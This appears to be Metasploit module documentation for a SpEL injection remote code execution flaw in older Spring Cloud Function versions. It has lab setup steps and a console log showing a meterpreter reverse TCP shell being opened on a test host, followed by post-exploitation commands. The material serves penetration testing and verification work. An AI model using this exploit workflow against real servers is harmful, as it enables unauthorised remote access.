## Vulnerable Application

Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using
an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting
the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code
execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.

## Verification Steps

1. Build the application
   1. `wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip`
   2. `unzip v3.1.6.zip`
   3. `cd spring-cloud-function-3.1.6/spring-cloud-function-samples/function-sample-pojo`
   4. `mvn package`
2. Run the application
   1. `java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar`
3. Start msfconsole
4. Run: `use exploit/multi/http/spring_cloud_function_spel_injection`
5. Set the `RHOSTS`, `TARGET`, `PAYLOAD` and payload associated datastore options
6. Run the exploit

## Options

## Scenarios

### Spring Cloud Function v3.1.6 on Fedora 34

```
msf6 exploit(multi/http/spring_could_function_spel_injection) > show options 

Module options (exploit/multi/http/spring_could_function_spel_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.128  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /functionRouter  yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(multi/http/spring_could_function_spel_injection) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (39920 bytes) to 192.168.250.134
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.134:56924 ) at 2022-03-30 17:59:07 -0400

meterpreter > getuid
Server username: smcintyre
meterpreter > pwd
/home/smcintyre/spring-rce/spring-cloud-function-3.1.6/spring-cloud-function-samples/function-sample-pojo
meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 5.16.14-100.fc34.x86_64 #1 SMP PREEMPT Fri Mar 11 20:24:01 UTC 2022
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > 
```
